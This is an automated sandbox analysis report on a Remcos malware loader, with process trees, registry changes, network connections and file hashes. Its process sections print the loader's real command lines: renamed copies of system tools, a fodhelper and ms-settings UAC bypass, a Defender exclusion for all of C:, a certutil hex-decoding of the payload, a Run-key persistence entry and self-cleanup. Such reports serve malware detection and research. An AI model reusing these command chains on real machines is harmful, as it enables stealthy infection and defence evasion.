Analysis Overview
SHA256
99c9604c43f258385150f75b5df3e7d7a4a2c5364ed7d0ce592a90ea3b076323
Threat Level: Known bad
The file 17173318465.zip was found to be: Known bad.
Malicious Activity Summary
Remcos
Executes dropped EXE
Checks computer location settings
Loads dropped DLL
Adds Run key to start application
Enumerates physical storage devices
Program crash
Modifies registry class
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Suspicious behavior: GetForegroundWindowSpam
Runs ping.exe
Script User-Agent
Kills process with taskkill
Suspicious use of SendNotifyMessage
Suspicious behavior: CmdExeWriteProcessMemorySpam
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-09 09:31
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-09 09:31
Reported
2024-05-09 09:35
Platform
win7-20240221-en
Max time kernel
199s
Max time network
122s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\xkn.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\ger.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\kn.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\kn.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\Libraries\sppsvc.pif | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\xkn.exe | N/A |
| N/A | N/A | C:\Users\Public\xkn.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Public\Libraries\sppsvc.pif |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\ms-settings\shell\open | C:\Users\Public\ger.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\"" | C:\Users\Public\ger.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\ms-settings\shell\open\command | C:\Users\Public\ger.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\ms-settings | C:\Users\Public\ger.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\ms-settings\shell | C:\Users\Public\ger.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\Libraries\sppsvc.pif | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\xkn.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Public\xkn.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\17173318465.zip
C:\Windows\system32\verclsid.exe
"C:\Windows\system32\verclsid.exe" /S /C {0B2C9183-C9FA-4C53-AE21-C900B0C39965} /I {0C733A8A-2A1C-11CE-ADE5-00AA0044773D} /X 0x401
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\bf91fe9e-454c-40ba-954e-3663f5b1fb84.tmp"
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\17173318465.zip"
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\Desktop\5d3624460b990081e4cbccd1b358bec784a42f219d55d94043d31787502dd3f3.cmd" "
C:\Windows\System32\extrac32.exe
C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
C:\Windows\System32\extrac32.exe
C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\WSReset.exe "C:\\Windows \\System32\\itsme.exe"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
C:\Users\Public\xkn.exe
C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
C:\Users\Public\alpha.exe
"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
C:\Users\Public\ger.exe
C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\Desktop\5d3624460b990081e4cbccd1b358bec784a42f219d55d94043d31787502dd3f3.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\Desktop\5d3624460b990081e4cbccd1b358bec784a42f219d55d94043d31787502dd3f3.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM SystemSettings.exe
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2
C:\Windows\system32\PING.EXE
ping 127.0.0.1 -n 2
C:\Users\Public\Libraries\sppsvc.pif
C:\Users\Public\Libraries\sppsvc.pif
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\sppsvc.rtf" / A / F / Q / S
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2936 -s 692
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | onedrive.live.com | udp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
Files
C:\Users\Admin\Desktop\5d3624460b990081e4cbccd1b358bec784a42f219d55d94043d31787502dd3f3.cmd
| MD5 | 366a8d4073f8409849e001e7feb3d894 |
| SHA1 | 207a1fc1e41e3e7776511e692a9cb166d59d2d13 |
| SHA256 | 5d3624460b990081e4cbccd1b358bec784a42f219d55d94043d31787502dd3f3 |
| SHA512 | f262b68076974242a84fdd0b301a2307d550dfd9f884801902974e29f0a3d2dc0699e5aaad2c319e6aec87bcdf5190bc11cc938fc69d9668e3b85c57ed0ea51f |
\Users\Public\alpha.exe
| MD5 | 5746bd7e255dd6a8afa06f7c42c1ba41 |
| SHA1 | 0f3c4ff28f354aede202d54e9d1c5529a3bf87d8 |
| SHA256 | db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386 |
| SHA512 | 3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e |
\Users\Public\xkn.exe
| MD5 | 852d67a27e454bd389fa7f02a8cbe23f |
| SHA1 | 5330fedad485e0e4c23b2abe1075a1f984fde9fc |
| SHA256 | a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8 |
| SHA512 | 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d |
memory/2180-34-0x000000001B550000-0x000000001B832000-memory.dmp
memory/2180-35-0x0000000000490000-0x0000000000498000-memory.dmp
C:\Users\Public\ger.exe
| MD5 | 9d0b3066fe3d1fd345e86bc7bcced9e4 |
| SHA1 | e05984a6671fcfecbc465e613d72d42bda35fd90 |
| SHA256 | 4e66b857b7010db8d4e4e28d73eb81a99bd6915350bb9a63cd86671051b22f0e |
| SHA512 | d773ca3490918e26a42f90f5c75a0728b040e414d03599ca70e99737a339858e9f0c99711bed8eeebd5e763d10d45e19c4e7520ee62d6957bc9799fd62d4e119 |
\Users\Public\kn.exe
| MD5 | ec1fd3050dbc40ec7e87ab99c7ca0b03 |
| SHA1 | ae7fdfc29f4ef31e38ebf381e61b503038b5cb35 |
| SHA256 | 1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3 |
| SHA512 | 4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2 |
C:\Users\Public\sppsvc.rtf
| MD5 | 8ab8b1cab45b50b97ff80bff5e10291a |
| SHA1 | 966cd90ae89517d31fecc7bfaccec8703ddecfdb |
| SHA256 | 9b6ed53256341d48bc5981e48c8bb1e7547928143af4b33f0433468c7a4e11fd |
| SHA512 | 02adb968d9a6153fd055cff48aaa7c2328d41a5a14b88b7509955903a12e5c7a07ade608a7ffb54d9bfebe243a7f01d5c9655dcd3276110f32e5ee0b2c322cdf |
C:\Users\Public\Libraries\sppsvc.pif
| MD5 | e62ff91b6b729d830b15d8f81bc57ede |
| SHA1 | 38b3ac66c5899d0de5a91f66ecee1cb6e95b2973 |
| SHA256 | 33a072ab2cc4195ed145081a2c88f2b000bdcae9c4b5989c7e9013feabb6ec59 |
| SHA512 | 9ef30e503f09061a72560a384dd25c5028db46154cce430c1db7149cc697c795f86effd691167d61606402927087d0dc34366487ae7714b650bd42919e558d1f |
memory/2936-68-0x0000000000400000-0x0000000000522000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-09 09:31
Reported
2024-05-09 09:35
Platform
win10v2004-20240508-en
Max time kernel
209s
Max time network
211s
Command Line
Signatures
Remcos
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | C:\Windows \System32\per.exe | N/A |
Executes dropped EXE
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rzwxyjvt = "C:\\Users\\Public\\Rzwxyjvt.url" | C:\Users\Public\Libraries\sppsvc.pif | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\ms-settings | C:\Users\Public\ger.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\ms-settings\shell | C:\Users\Public\ger.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\ms-settings\shell\open | C:\Users\Public\ger.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\"" | C:\Users\Public\ger.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\ms-settings\shell\open\command | C:\Users\Public\ger.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\xkn.exe | N/A |
| N/A | N/A | C:\Users\Public\xkn.exe | N/A |
| N/A | N/A | C:\Users\Public\Libraries\sppsvc.pif | N/A |
| N/A | N/A | C:\Users\Public\Libraries\sppsvc.pif | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Public\xkn.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\SndVol.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\SndVol.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\SndVol.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\17173318465.zip
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\17173318465.zip"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\5d3624460b990081e4cbccd1b358bec784a42f219d55d94043d31787502dd3f3.cmd" "
C:\Windows\System32\extrac32.exe
C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
C:\Windows\System32\extrac32.exe
C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\WSReset.exe "C:\\Windows \\System32\\itsme.exe"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
C:\Users\Public\xkn.exe
C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
C:\Users\Public\alpha.exe
"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
C:\Users\Public\ger.exe
C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\Desktop\5d3624460b990081e4cbccd1b358bec784a42f219d55d94043d31787502dd3f3.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\Desktop\5d3624460b990081e4cbccd1b358bec784a42f219d55d94043d31787502dd3f3.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
C:\Windows \System32\per.exe
"C:\\Windows \\System32\\per.exe"
C:\Windows\system32\SystemSettingsAdminFlows.exe
"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM SystemSettings.exe
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2
C:\Windows\system32\PING.EXE
ping 127.0.0.1 -n 2
C:\Users\Public\Libraries\sppsvc.pif
C:\Users\Public\Libraries\sppsvc.pif
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\sppsvc.rtf" / A / F / Q / S
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
C:\Windows\SysWOW64\extrac32.exe
C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\sppsvc.pif C:\\Users\\Public\\Libraries\\Rzwxyjvt.PIF
C:\Windows\SysWOW64\SndVol.exe
C:\Windows\System32\SndVol.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cxcs.microsoft.net | udp |
| CZ | 104.64.113.235:443 | cxcs.microsoft.net | tcp |
| US | 8.8.8.8:53 | 130.211.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | onedrive.live.com | udp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | vxqzaw.db.files.1drv.com | udp |
| US | 13.107.42.12:443 | vxqzaw.db.files.1drv.com | tcp |
| US | 8.8.8.8:53 | 11.137.107.13.in-addr.arpa | udp |
| US | 20.121.128.235:4876 | tcp | |
| US | 8.8.8.8:53 | 12.42.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.128.121.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| US | 8.8.8.8:53 | 50.33.237.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.179.89.13.in-addr.arpa | udp |
Files
C:\Users\Admin\Desktop\5d3624460b990081e4cbccd1b358bec784a42f219d55d94043d31787502dd3f3.cmd
| MD5 | 366a8d4073f8409849e001e7feb3d894 |
| SHA1 | 207a1fc1e41e3e7776511e692a9cb166d59d2d13 |
| SHA256 | 5d3624460b990081e4cbccd1b358bec784a42f219d55d94043d31787502dd3f3 |
| SHA512 | f262b68076974242a84fdd0b301a2307d550dfd9f884801902974e29f0a3d2dc0699e5aaad2c319e6aec87bcdf5190bc11cc938fc69d9668e3b85c57ed0ea51f |
C:\Users\Public\alpha.exe
| MD5 | 8a2122e8162dbef04694b9c3e0b6cdee |
| SHA1 | f1efb0fddc156e4c61c5f78a54700e4e7984d55d |
| SHA256 | b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450 |
| SHA512 | 99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397 |
C:\Users\Public\xkn.exe
| MD5 | 04029e121a0cfa5991749937dd22a1d9 |
| SHA1 | f43d9bb316e30ae1a3494ac5b0624f6bea1bf054 |
| SHA256 | 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f |
| SHA512 | 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xfs44mvg.4t2.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3500-43-0x00000186D3AC0000-0x00000186D3AE2000-memory.dmp
C:\Users\Public\ger.exe
| MD5 | 227f63e1d9008b36bdbcc4b397780be4 |
| SHA1 | c0db341defa8ef40c03ed769a9001d600e0f4dae |
| SHA256 | c0e25b1f9b22de445298c1e96ddfcead265ca030fa6626f61a4a4786cc4a3b7d |
